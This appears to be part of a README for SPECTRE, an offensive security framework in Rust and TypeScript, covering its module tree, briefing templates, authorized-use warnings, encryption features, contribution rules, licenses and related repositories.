│   │   │   ├── results/        # Results aggregation (JSON/XML/grep output)
│   │   │   ├── pipeline/       # Data pipeline (composable stages)
│   │   │   ├── campaign/       # Campaign management (SQLite persistence)
│   │   │   ├── plugin/         # Plugin system (Lua sandbox, registry, hooks, templates)
│   │   │   │   ├── mod.rs          # Plugin loading, discovery
│   │   │   │   ├── sandbox.rs      # Lua 5.4 sandbox (mlua)
│   │   │   │   ├── api.rs          # spectre.* Lua API
│   │   │   │   ├── manifest.rs     # plugin.toml manifest, permissions
│   │   │   │   ├── registry.rs     # Plugin registry, dependency resolution
│   │   │   │   ├── hooks.rs        # Event hooks (10 lifecycle events)
│   │   │   │   └── template.rs     # Plugin scaffolding (5 types)
│   │   │   ├── orchestration/  # Scan orchestration (Phase 4)
│   │   │   │   ├── mod.rs          # Module exports
│   │   │   │   ├── chain.rs        # Scan chaining with step conditions
│   │   │   │   ├── template.rs     # Scan templates and library
│   │   │   │   ├── schedule.rs     # Cron-based scan scheduling
│   │   │   │   ├── profile.rs      # User-defined scan profiles
│   │   │   │   ├── timing.rs       # Adaptive timing adjustment
│   │   │   │   └── checkpoint.rs   # Checkpoint/resume for scans
│   │   │   ├── workflow/       # Workflow automation (Phase 4)
│   │   │   │   ├── mod.rs          # Module exports
│   │   │   │   ├── dsl.rs          # Workflow DSL types
│   │   │   │   ├── parser.rs       # YAML/JSON/TOML parser
│   │   │   │   ├── executor.rs     # Async workflow executor
│   │   │   │   ├── variables.rs    # Variable store and substitution
│   │   │   │   ├── template.rs     # Built-in workflow templates
│   │   │   │   └── persistence.rs  # Workflow save/load
│   │   │   ├── recipe/         # Recipe management (Phase 4)
│   │   │   │   ├── mod.rs          # Module exports
│   │   │   │   ├── storage.rs      # File-based recipe storage
│   │   │   │   ├── format.rs       # Import/export (JSON/YAML/TOML)
│   │   │   │   ├── search.rs       # Recipe search and browsing
│   │   │   │   ├── validate.rs     # Recipe validation
│   │   │   │   └── builtin.rs      # Built-in recipe library
│   │   │   ├── report/         # Report generation (Phase 4)
│   │   │   │   ├── mod.rs          # Module exports, ReportData
│   │   │   │   ├── template.rs     # Report template config
│   │   │   │   ├── html.rs         # HTML report generator
│   │   │   │   ├── markdown.rs     # Markdown report generator
│   │   │   │   └── summary.rs      # Executive summary builder
│   │   │   ├── export/         # Export formats (Phase 4)
│   │   │   │   ├── mod.rs          # Module exports
│   │   │   │   ├── csv.rs          # CSV exporter (results/hosts/findings)
│   │   │   │   ├── template.rs     # Custom export template engine
│   │   │   │   ├── scheduler.rs    # Export scheduling
│   │   │   │   └── incremental.rs  # Incremental export tracking
│   │   │   └── perf/           # Performance optimization (Phase 4)
│   │   │       ├── mod.rs          # Module exports
│   │   │       ├── cache.rs        # LRU cache implementation
│   │   │       ├── pool.rs         # Connection pool (async mutex)
│   │   │       └── metrics.rs      # Performance metrics collection
│   │   └── tests/              # Integration tests (Phase 4)
│   │       ├── integration_orchestration.rs  # Scan orchestration tests (9)
│   │       ├── integration_workflow.rs       # Workflow engine tests (9)
│   │       ├── integration_report.rs         # Report generation tests (7)
│   │       ├── integration_export.rs         # Export format tests (8)
│   │       ├── integration_plugin.rs         # Plugin system tests (6)
│   │       └── integration_perf.rs           # Performance layer tests (6)
│   ├── spectre-tui/        # TUI dashboard (18 files, 268 tests)
│   │   ├── Cargo.toml
│   │   └── src/
│   │       ├── lib.rs          # Module declarations, re-exports
│   │       ├── app.rs          # App struct, state management, event dispatch
│   │       ├── event.rs        # Async EventHandler (crossterm + tick timer)
│   │       ├── terminal.rs     # Terminal init/restore, panic hook
│   │       ├── tui.rs          # Main run() entry point with async event loop
│   │       ├── layout.rs       # 4-panel layout, Grid/Wide/Tall/Focus modes
│   │       ├── theme.rs        # 5 built-in themes, color schemes
│   │       ├── command.rs      # Command input, 11 commands, history, completion
│   │       ├── keybindings.rs  # Key mapping, vim-style nav, F-keys
│   │       ├── scan_state.rs   # Scan progress tracking, ETA, filtering
│   │       ├── panels/         # 4 panel implementations
│   │       │   ├── recon.rs        # Scan metrics, progress bar, results table
│   │       │   ├── analysis.rs     # CyberChef recipe status, output preview
│   │       │   ├── comms.rs        # Peer connections, transfer queue
│   │       │   └── campaign.rs     # Phase timeline, campaign metrics
│   │       └── widgets/        # Shared widget components
│   │           ├── help_overlay.rs # Help popup with keybinding groups
│   │           └── status_bar.rs   # Header bar + status bar rendering
│   ├── spectre-gui/        # GUI application — Tauri 2.10 + React 19 (13 Rust files, 32 tests)
│   │   ├── Cargo.toml          # Binary+library crate (staticlib, cdylib, rlib)
│   │   ├── build.rs            # tauri_build::build()
│   │   ├── tauri.conf.json     # Tauri config (1280x800 window, CSP, bundle)
│   │   ├── capabilities/       # IPC security permissions (default.json)
│   │   ├── icons/              # App icons (32x32, 128x128, @2x, ico, icns)
│   │   ├── src/
│   │   │   ├── main.rs         # Desktop entry point
│   │   │   ├── lib.rs          # Tauri Builder, plugins, 21 IPC handlers
│   │   │   ├── state.rs        # AppState (RwLock<Config>)
│   │   │   ├── events.rs       # Event payloads (scan progress/result/complete/error)
│   │   │   └── commands/       # IPC command handlers
│   │   │       ├── status.rs       # get_version, get_status (fully wired)
│   │   │       ├── scan.rs         # start_scan, stop_scan, get_scan_results (stubs)
│   │   │       ├── chef.rs         # execute_chef, list_chef_operations (stubs)
│   │   │       ├── comms.rs        # get_identity, list_peers, send_data (stubs)
│   │   │       ├── campaign.rs     # create/list/get/advance campaign (stubs)
│   │   │       ├── config.rs       # get_config, set_config (stubs)
│   │   │       ├── results.rs      # get_dashboard_stats, get_findings (stubs)
│   │   │       ├── report.rs       # generate_report, export_data (stubs)
│   │   │       └── target.rs       # parse_targets (stub)
│   │   └── frontend/           # React 19 + Vite 6 + TypeScript (8 files, 5 tests)
│   │       ├── package.json
│   │       ├── vite.config.ts
│   │       ├── tsconfig.json
│   │       ├── index.html
│   │       └── src/
│   │           ├── main.tsx        # React root
│   │           ├── App.tsx         # Version + status display via IPC
│   │           ├── styles.css      # Dark theme with SPECTRE accent colors
│   │           └── App.test.tsx    # 5 vitest tests
│   └── spectre-mcp/        # MCP server (planned - Phase 6)
│
├── configs/
│   └── spectre.toml        # Default configuration
│
├── docs/
│   ├── architecture/       # System design documentation
│   ├── user-guide/         # Usage documentation
│   ├── integration/        # Component integration guides
│   ├── briefings/          # Mission briefing templates
│   ├── development/        # Developer documentation
│   ├── api/                # API specifications
│   ├── security/           # Security documentation
│   ├── deployment/         # Deployment guides
│   ├── tutorials/          # Step-by-step tutorials
│   └── reference/          # Reference materials
│
├── to-dos/                 # Sprint planning (7 phases)
│
├── .github/
│   ├── workflows/          # CI/CD (ci.yml, release.yml)
│   ├── ISSUE_TEMPLATE/     # Bug report, feature request
│   └── PULL_REQUEST_TEMPLATE.md
│
└── tests/                  # Integration tests (planned)

---

Mission Briefing Documentation

SPECTRE documentation follows military operational formatting for clarity and familiarity. Templates are available in docs/briefings/.

OPORD (Operations Order)

Standard 5-paragraph format for campaign planning — see OPORD-template.md.

SITREP (Situation Report)

Real-time campaign status updates — see SITREP.md.

CONOP (Concept of Operations)

Detailed operational methodology — see CONOP-template.md.

AAR (After Action Review)

Post-campaign analysis — see AAR-template.md.

---

Security & Legal

Responsible Use

IMPORTANT: SPECTRE is designed for authorized security testing only.

• Only use on networks you own or have explicit written permission to test
• Unauthorized scanning and intrusion may violate laws (CFAA, CMA, etc.)
• Always obtain proper authorization and define scope before testing
• Follow your organization's rules of engagement (ROE)

Security Features

• All communications encrypted with modern cryptography (XChaCha20-Poly1305)
• Traffic analysis resistance built-in (Elligator2, protocol mimicry)
• No telemetry or phone-home functionality
• Audit logging for compliance
• Post-quantum hybrid encryption available (X25519 + ML-KEM-768)

---

Contributing

We welcome contributions! See CONTRIBUTING.md for detailed guidelines.

Component-specific guidelines:

• WRAITH-Protocol CONTRIBUTING.md
• ProRT-IP CONTRIBUTING.md
• CyberChef-MCP CONTRIBUTING.md

Development Standards

• Rust code: cargo fmt, cargo clippy -- -D warnings, pedantic/nursery clean
• TypeScript/JavaScript: ESLint, Prettier
• Commit messages: Conventional Commits
• All PRs require tests and documentation
• See SECURITY.md for vulnerability reporting

---

License

SPECTRE is a multi-license project reflecting its component licenses:

Component	License
SPECTRE (CLI, Core, TUI, GUI, MCP)	MIT
WRAITH-Protocol	MIT
ProRT-IP	GPLv3
CyberChef-MCP	Apache 2.0

See individual component repositories for full license texts.

---

Acknowledgments

SPECTRE builds on the shoulders of giants:

Security Research: Nmap | Masscan | Cobalt Strike | Sliver

Cryptography: Noise Protocol | Signal Protocol | WireGuard

Data Analysis: CyberChef | Model Context Protocol

---

Links

• Repository: github.com/doublegate/SPECTRE
• Issues: GitHub Issues
• Discussions: GitHub Discussions

Related Repositories

Repository	Description
WRAITH-Protocol	Secure communications component (v2.3.7)
ProRT-IP	Network reconnaissance component (v1.0.0)
CyberChef-MCP	Data analysis component (v1.9.0)

---

SPECTRE — Unified Offensive Security

Version: 0.5.0-alpha.1 | License: Multi-license | Language: Rust + TypeScript | Status: Active Development

Last Updated: 2026-02-05